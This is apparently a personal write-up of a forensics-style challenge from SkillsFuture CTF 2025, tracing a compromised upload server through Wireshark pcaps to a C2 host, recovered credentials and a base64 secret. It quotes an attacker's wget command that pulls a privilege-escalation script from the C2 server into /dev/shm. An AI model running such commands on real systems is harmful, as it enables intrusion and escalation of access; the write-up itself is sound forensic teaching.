👮♂️SFF CTF 25
SkillsFuture CTF 2025 - Forensics-style kind of CTF Challenges
On 19th July I participated in the SkillsFuture (SFF) CTF open category and got 3rd place after solving all the challenges in 19 minutes and 43 seconds.
The background context behind the CTF is that you are doing some forensics work for a police station, and a file upload server has been compromised. The challenges are done sequentially, so you have to do the current challenge to move on to the next.
We are first given a pcap file containing the network traffic between the file upload server and the public.
Suspicious file name
We are told that we need to look for a suspicious file upload, and to submit the name of the file as the answer for the first challenge. Open the pcap using wireshark and filter to search specifically for http file uploads:

Going to the second last entry and looking under HTTP File Data, we can see that the malicious file uploaded was hell0fr13nd.py
:

C2 Server IP address and Port
For the second question we are told that the malicious file causes the server to establish a connection with a C2 server, and we are asked for the IP address and port of the C2 server. We can find this information from the same packet. The IP address is 3.237.200.21
and port is 1234
.
Command used to download file from C2 server
For the third question we are asked for the command run on the file upload server to retrieve a file from the C2 server. For this we need to change the filter to look for http requests and responses with the C2 server. We can use http && ip.addr == 3.237.200.21
as our filter.

We can see that we are retrieving linuxprivchecker.py
via a GET request to the C2 server, but we still do not know the command used to retrieve it. Now we can apply the ip.addr == 3.237.200.21 && tcp.port == 1234
filter to find the command used:

So the command used was wget http://3.237.200.21:8000/linuxprivchecker.py -O /dev/shm/linuxprivchecker.py
.
Part 2 - Web server credentials
For the next part, we need to find the credentials used to access a web server at http://3.86.60.136/
In order to do this, we are given a bunch of pcaps and we are told that one of them contains the network traffic from when an admin logged in to the server. To do this quickly we can just cd
into the folder containing all the pcaps, and run strings * | grep username
.

Secret message
For the last part, we are asked for the secret message displayed by the webserver. We login and see the message U3VwZXIgQ29uZmlkZW50aWFs
. But this is not the answer, so we base64 decode it and obtain the actual message: Super Confidential
That concludes the CTF! It was quite easy to solve (especially so with ChatGPT) but I was slowed down by my unfamiliarity with Wireshark. :)
Last updated